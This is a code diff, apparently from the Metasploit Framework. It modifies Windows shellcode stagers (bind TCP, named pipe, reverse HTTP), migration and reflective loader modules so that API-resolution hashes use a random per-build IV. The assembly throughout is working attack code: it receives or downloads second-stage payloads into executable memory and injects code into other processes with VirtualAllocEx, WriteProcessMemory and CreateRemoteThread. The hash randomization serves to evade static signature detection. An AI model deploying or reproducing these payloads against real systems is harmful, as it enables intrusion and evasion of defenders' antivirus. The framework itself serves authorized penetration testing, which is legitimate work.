push ecx ; lpMode (PIPE_WAIT)
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
push #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
call ebp ; SetNamedPipeHandleState(hPipe, lpMode, lpMaxCollectionCount, lpCollectDataTimeout)
^
end
@@ -217,7 +217,7 @@ module Payload::Windows::BindNamedPipe
lea ecx, [esp+16] ; lpBuffer
push ecx
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
push #{block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
pop eax ; lpNumberOfBytesRead
pop esi ; lpBuffer (stage size)
@@ -238,7 +238,7 @@ module Payload::Windows::BindNamedPipe
push 0x1000 ; MEM_COMMIT
push esi ; dwLength
push 0 ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc(NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
^
@@ -267,7 +267,7 @@ module Payload::Windows::BindNamedPipe
push edx ; nNumberOfBytesToRead
push ebx ; lpBuffer
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
push #{block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
pop edx ; lpNumberOfBytesRead
^
@@ -283,13 +283,13 @@ module Payload::Windows::BindNamedPipe
push 0x8000 ; MEM_RELEASE
push 0 ; dwSize, 0 to decommit whole block
push ecx ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
push #{block_api_hash('kernel32.dll', 'VirtualFree')}
call ebp ; VirtualFree(payload, 0, MEM_RELEASE)
cleanup_file:
; cleanup the pipe handle
push edi ; file handle
push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
push #{block_api_hash('kernel32.dll', 'CloseHandle')}
call ebp ; CloseHandle(hPipe)
jmp failure
@@ -319,14 +319,14 @@ module Payload::Windows::BindNamedPipe
call get_kernel32_name
db "kernel32", 0x00
get_kernel32_name:
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')}
push #{block_api_hash('kernel32.dll', 'GetModuleHandleA')}
call ebp ; GetModuleHandleA("kernel32")
call get_exit_name
db "ExitThread", 0x00
get_exit_name: ; lpProcName
push eax ; hModule
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
push #{block_api_hash('kernel32.dll', 'GetProcAddress')}
call ebp ; GetProcAddress(hModule, "ExitThread")
push 0 ; dwExitCode
call eax ; ExitProcess(0)
+11 -11
View File
@@ -121,14 +121,14 @@ module Payload::Windows::BindTcp
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
push 0x5F327377 ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this struct
push eax ; push the wVersionRequested parameter
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup( 0x0190, &WSAData );
push 11
@@ -144,7 +144,7 @@ module Payload::Windows::BindTcp
; we do not specify a protocol [5]
push 1 ; push SOCK_STREAM
push #{addr_fam} ; push AF_INET/6
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
@@ -155,7 +155,7 @@ module Payload::Windows::BindTcp
push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
push esi ; pointer to the sockaddr_in struct
push edi ; socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
push #{block_api_hash('ws2_32.dll', 'bind')}
call ebp ; bind( s, &sockaddr_in, 16 );
^
@@ -170,18 +170,18 @@ module Payload::Windows::BindTcp
asm << %Q^
; backlog, pushed earlier [3]
push edi ; socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
push #{block_api_hash('ws2_32.dll', 'listen')}
call ebp ; listen( s, 0 );
; we set length for the sockaddr struct to zero, pushed earlier [2]
; we dont set the optional sockaddr param, pushed earlier [1]
push edi ; listening socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
push #{block_api_hash('ws2_32.dll', 'accept')}
call ebp ; accept( s, 0, 0 );
push edi ; push the listening socket
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
push #{block_api_hash('ws2_32.dll', 'closesocket')}
call ebp ; closesocket( s );
^
@@ -204,7 +204,7 @@ module Payload::Windows::BindTcp
push 4 ; length = sizeof( DWORD );
push esi ; the 4 byte buffer on the stack to hold the second stage length
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, &dwLength, 4, 0 );
^
@@ -223,7 +223,7 @@ module Payload::Windows::BindTcp
push 0x1000 ; MEM_COMMIT
push esi ; push the newly received second stage length.
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
xchg ebx, eax ; ebx = our new memory address for the new stage
@@ -233,7 +233,7 @@ module Payload::Windows::BindTcp
push esi ; length
push ebx ; the current address into our second stage's RWX buffer
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, buffer, length, 0 );
^
@@ -261,7 +261,7 @@ module Payload::Windows::BindTcp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
+4 -4
View File
@@ -61,7 +61,7 @@ module Payload::Windows::BindTcpRc4
push 4 ; length = sizeof( DWORD );
push esi ; the 4 byte buffer on the stack to hold the second stage length
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, &dwLength, 4, 0 );
^
@@ -83,7 +83,7 @@ module Payload::Windows::BindTcpRc4
; push esi ; push the newly received second stage length.
push ecx ; push the alloc length
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box
@@ -96,7 +96,7 @@ module Payload::Windows::BindTcpRc4
push esi ; length
push ebx ; the current address into our second stage's RWX buffer
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, buffer, length, 0 );
^
@@ -138,7 +138,7 @@ module Payload::Windows::BindTcpRc4
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
+21 -1
View File
@@ -10,12 +10,32 @@ module Msf
###
module Payload::Windows::BlockApi
@block_api_iv = nil
def block_api_iv(opts={})
@block_api_iv ||= rand(0x100000000)
end
def asm_block_api(opts={})
Rex::Payloads::Shuffle.from_graphml_file(
asm = Rex::Payloads::Shuffle.from_graphml_file(
File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x86.graphml'),
arch: ARCH_X86,
name: 'api_call'
)
iv = opts.fetch(:block_api_iv) { block_api_iv }
# Patch the assembly to set the correct IV
# db 0xbf, 0x00, 0x00, 0x00, 0x00 => mov edi, <iv>
iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
unless asm.include?("db 0xbf, 0x00, 0x00, 0x00, 0x00")
raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})"
end
asm.sub!("db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}")
asm
end
def block_api_hash(mod, func, opts={})
iv = opts.fetch(:block_api_iv) { block_api_iv }
Rex::Text.block_api_hash(mod, func, iv: iv)
end
end
+6 -6
View File
@@ -18,7 +18,7 @@ module Payload::Windows::Exitfunk
when 'seh'
asm << %Q^
mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)}
mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')}
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; SetUnhandledExceptionFilter(0)
@@ -32,14 +32,14 @@ module Payload::Windows::Exitfunk
when 'thread'
asm << %Q^
mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')}
push #{block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7
jl exitfunk_goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne exitfunk_goodbye ;
mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
mov ebx, #{block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
exitfunk_goodbye: ; We now perform the actual call to the exit function
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
@@ -48,7 +48,7 @@ module Payload::Windows::Exitfunk
when 'process', nil
asm << %Q^
mov ebx, 0x#{Msf::Payload::Windows.exit_types['process'].to_s(16)}
mov ebx, #{block_api_hash('kernel32.dll', 'ExitProcess')}
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; ExitProcess(0)
@@ -56,7 +56,7 @@ module Payload::Windows::Exitfunk
when 'sleep'
asm << %Q^
mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
mov ebx, #{block_api_hash('kernel32.dll', 'Sleep')}
push 300000 ; 300 seconds
push ebx ; push the hash of the function
call ebp ; Sleep(300000)
@@ -31,7 +31,7 @@ module Payload::Windows::MigrateCommon
#{generate_migrate(opts)}
signal_event:
push dword [esi] ; Event handle is pointed at by esi
push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
push #{block_api_hash('kernel32.dll', 'SetEvent')}
call ebp ; SetEvent(handle)
call_payload:
call dword [esi+8] ; Invoke the associated payload
@@ -32,7 +32,7 @@ module Payload::Windows::MigrateNamedPipe
mov edi, [esi+16] ; The duplicated pipe handle is in the migrate context.
signal_pipe_event:
push dword [esi] ; Event handle is pointed at by esi
push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
push #{block_api_hash('kernel32.dll', 'SetEvent')}
call ebp ; SetEvent(handle)
call_pipe_payload:
call dword [esi+8] ; call the associated payload
+3 -3
View File
@@ -34,14 +34,14 @@ module Payload::Windows::MigrateTcp
push '32'
push 'ws2_'
push esp ; pointer to 'ws2_32'
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA('ws2_32')
init_networking:
mov eax, #{WSA_VERSION} ; EAX == version, and is also used for size
sub esp, eax ; allocate space for the WSAData structure
push esp ; Pointer to the WSAData structure
push eax ; Version required
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup(Version, &WSAData)
create_socket:
push eax ; eax is 0 on success, use it for flags
@@ -53,7 +53,7 @@ module Payload::Windows::MigrateTcp
push eax ; SOCK_STREAM
inc eax
push eax ; AF_INET
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
xchg edi, eax
^
+18 -18
View File
@@ -70,21 +70,21 @@ module Msf::Payload::Windows::PrependMigrate
exitblock = %Q^
;sleep
push -1
push #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" )
push #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" )
call ebp ; Sleep( ... );
^
# Check to see if we can find exitfunc in the payload
exitfunc_block_asm = %Q^
exitfunk:
mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... kernel32.dll!ExitThread
push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... kernel32.dll!ExitThread
push #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7
jl goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne goodbye ;
mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye: ; We now perform the actual call to the exit function
mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye: ; We now perform the actual call to the exit function
goodbye:
push 0x0 ; push the exit function parameter
push ebx ; push the hash of the exit function
@@ -135,7 +135,7 @@ module Msf::Payload::Windows::PrependMigrate
add esp,-400 ; adjust the stack to avoid corruption
lea edx,[esp+0x60]
push edx
push #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" )
push #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" )
call ebp ; GetStartupInfoA( &si );
lea eax,[esp+0x60] ; Put startupinfo pointer back in eax
@@ -158,7 +158,7 @@ module Msf::Payload::Windows::PrependMigrate
push esi ; lpCommandLine
push ebx ; lpApplicationName
push #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" )
push #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" )
call ebp ; CreateProcessA( &si );
; if we didn't get a new process, use this one
@@ -186,7 +186,7 @@ module Msf::Payload::Windows::PrependMigrate
xor ebx,ebx
push ebx ; address
push [edi] ; handle
push #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
push #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
call ebp ; VirtualAllocEx( ...);
; eax now contains the destination
@@ -198,7 +198,7 @@ module Msf::Payload::Windows::PrependMigrate
begin_of_payload_return: ; lpBuffer
push eax ; lpBaseAddress
push [edi] ; hProcess
push #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
push #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
call ebp ; WriteProcessMemory( ...)
; run the code (CreateRemoteThread())
@@ -210,7 +210,7 @@ module Msf::Payload::Windows::PrependMigrate
push ebx ; stacksize
push ebx ; lpThreadAttributes
push [edi]
push #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
push #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
call ebp ; CreateRemoteThread( ...);
#{exitblock} ; jmp to exitfunc or long sleep
@@ -244,21 +244,21 @@ module Msf::Payload::Windows::PrependMigrate
;sleep
xor rcx,rcx
dec rcx ; rcx = -1
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" )
call rbp ; Sleep( ... );
EOS
exitfunc_block_asm = %Q^
exitfunk:
mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user...
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user...
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
call rbp ; GetVersion(); (AL will = major version and AH will = minor version)
add rsp, 40 ; cleanup the default param space on stack
cmp al, 0x6 ; If we are not running on Windows Vista, 2008 or 7
jl goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne goodbye ;
mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye: ; We now perform the actual call to the exit function
push 0x0 ;
pop rcx ; set the exit function parameter
@@ -311,7 +311,7 @@ module Msf::Payload::Windows::PrependMigrate
; get our own startupinfo at esp+0x60
add rsp,-400 ; adjust the stack to avoid corruption
lea rcx,[rsp+0x30]
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" )
call rbp ; GetStartupInfoA( &si );
jmp getcommand
@@ -333,7 +333,7 @@ module Msf::Payload::Windows::PrependMigrate
mov r8, rcx ; lpProcessAttributes
mov rdx, rsi ; lpCommandLine
; rcx is already zero ; lpApplicationName
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" )
call rbp ; CreateProcessA( &si );
; if we didn't get a new process, use this one
@@ -363,7 +363,7 @@ module Msf::Payload::Windows::PrependMigrate
migrate_asm << <<-EOS
xor rdx,rdx ; address
mov rcx, [rdi] ; handle
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
call rbp ; VirtualAllocEx( ...);
; eax now contains the destination - save in ebx
@@ -377,7 +377,7 @@ module Msf::Payload::Windows::PrependMigrate
pop r8 ; lpBuffer
mov rdx, rax ; lpBaseAddress
mov rcx, [rdi] ; hProcess
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
call rbp ; WriteProcessMemory( ...);
; run the code (CreateRemoteThread())
@@ -389,7 +389,7 @@ module Msf::Payload::Windows::PrependMigrate
mov r8, rcx ; stacksize
;rdx already equals 0 ; lpThreadAttributes
mov rcx, [rdi]
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
call rbp ; CreateRemoteThread( ...);
#{exitblock} ; jmp to exitfunc or long sleep
@@ -4,7 +4,6 @@ module Msf
module Payload::Windows::ReflectivePELoader
include Payload::Windows::BlockApi
def asm_reflective_pe_loader(opts)
prologue = ''
if opts[:is_dll] == true
prologue = %(
@@ -33,7 +32,7 @@ start: ;
push 0x103000 ; MEM_COMMIT | MEM_TOP_DOWN | MEM_RESERVE
push dword [esp+12] ; dwSize
push 0x00 ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
push eax ; Save the new image base to stack
xor edx,edx ; Zero out the edx
@@ -129,7 +128,7 @@ LoadLibraryA:
push ecx ; Save ecx to stack
push edx ; Save edx to stack
push eax ; Push the address of linrary name string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; ror13( "kernel32.dll", "LoadLibraryA" )
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; ror13( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA([esp+4])
pop edx ; Retrieve edx
pop ecx ; Retrieve ecx
@@ -139,7 +138,7 @@ GetProcAddress:
push edx ; Save edx to stack
push eax ; Push the address of proc name string
push ebx ; Push the dll handle
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} ; ror13( "kernel32.dll", "GetProcAddress" )
push #{block_api_hash('kernel32.dll', 'GetProcAddress')} ; ror13( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(ebx,[esp+4])
pop edx ; Retrieve edx
pop ecx ; Retrieve ecx
+15 -15
View File
@@ -246,7 +246,7 @@ module Payload::Windows::ReverseHttp
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
push esp ; Push a pointer to the "wininet" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "wininet" )
xor ebx, ebx ; Set ebx to NULL to use in future arguments
^
@@ -285,7 +285,7 @@ module Payload::Windows::ReverseHttp
^
end
asm << %Q^
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
push #{block_api_hash('wininet.dll', 'InternetOpenA')}
call ebp
^
@@ -302,7 +302,7 @@ module Payload::Windows::ReverseHttp
db "#{opts[:url]}", 0x00
got_server_host:
push eax ; HINTERNET hInternet (still in eax from InternetOpenA)
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
push #{block_api_hash('wininet.dll', 'InternetConnectA')}
call ebp
mov esi, eax ; Store hConnection in esi
^
@@ -321,7 +321,7 @@ module Payload::Windows::ReverseHttp
; LPVOID lpBuffer (username from previous call)
push 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
push esi ; hConnection
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
call ebp
^
end
@@ -337,7 +337,7 @@ module Payload::Windows::ReverseHttp
; LPVOID lpBuffer (password from previous call)
push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
push esi ; hConnection
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
call ebp
^
end
@@ -352,7 +352,7 @@ module Payload::Windows::ReverseHttp
push edi ; server URI
push ebx ; method
push esi ; hConnection
push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
push #{block_api_hash('wininet.dll', 'HttpOpenRequestA')}
call ebp
xchg esi, eax ; save hHttpRequest in esi
^
@@ -379,7 +379,7 @@ module Payload::Windows::ReverseHttp
push eax ; &dwFlags
push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
call ebp
^
end
@@ -406,14 +406,14 @@ module Payload::Windows::ReverseHttp
asm << %Q^
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
push #{block_api_hash('wininet.dll', 'HttpSendRequestA')}
call ebp
test eax,eax
jnz allocate_memory
set_wait:
push #{retry_wait} ; dwMilliseconds
push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
push #{block_api_hash('kernel32.dll', 'Sleep')}
call ebp ; Sleep( dwMilliseconds );
^
@@ -442,7 +442,7 @@ module Payload::Windows::ReverseHttp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -459,7 +459,7 @@ module Payload::Windows::ReverseHttp
push 4 ; bytes to read
push eax ; &stage size
push esi ; hRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
push #{block_api_hash('wininet.dll', 'InternetReadFile')}
call ebp ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
pop ebx ; bytesRead (unused, pop for cleaning)
pop ebx ; stage size
@@ -470,7 +470,7 @@ module Payload::Windows::ReverseHttp
push 0x1000 ; MEM_COMMIT
push ebx ; Stage allocation
push eax ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
@@ -482,7 +482,7 @@ module Payload::Windows::ReverseHttp
push eax ; read length
push ebx ; buffer
push esi ; hRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
push #{block_api_hash('wininet.dll', 'InternetReadFile')}
call ebp
test eax,eax ; download failed? (optional?)
jz failure
@@ -495,7 +495,7 @@ module Payload::Windows::ReverseHttp
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (4Mb ought to do us)
push ebx ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
@@ -509,7 +509,7 @@ module Payload::Windows::ReverseHttp
push 8192 ; read length
push ebx ; buffer
push esi ; hRequest
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
push #{block_api_hash('wininet.dll', 'InternetReadFile')}
call ebp
test eax,eax ; download failed? (optional?)
@@ -126,7 +126,7 @@ module Payload::Windows::ReverseNamedPipe
db "#{full_pipe_name}", 0x00
get_pipe_name:
; lpFileName (via call)
push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')}
push #{block_api_hash('kernel32.dll', 'CreateFileA')}
call ebp ; CreateFileA(...)
; If eax is -1, then we had a failure.
@@ -147,7 +147,7 @@ module Payload::Windows::ReverseNamedPipe
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -172,7 +172,7 @@ module Payload::Windows::ReverseNamedPipe
push 4 ; nNumberOfBytesToRead = sizeof( DWORD );
push esi ; lpBuffer
push edi ; hFile
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
push #{block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(...) to read the size
^
@@ -195,7 +195,7 @@ module Payload::Windows::ReverseNamedPipe
push 0x1000 ; MEM_COMMIT
push esi ; push the newly received second stage length.
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
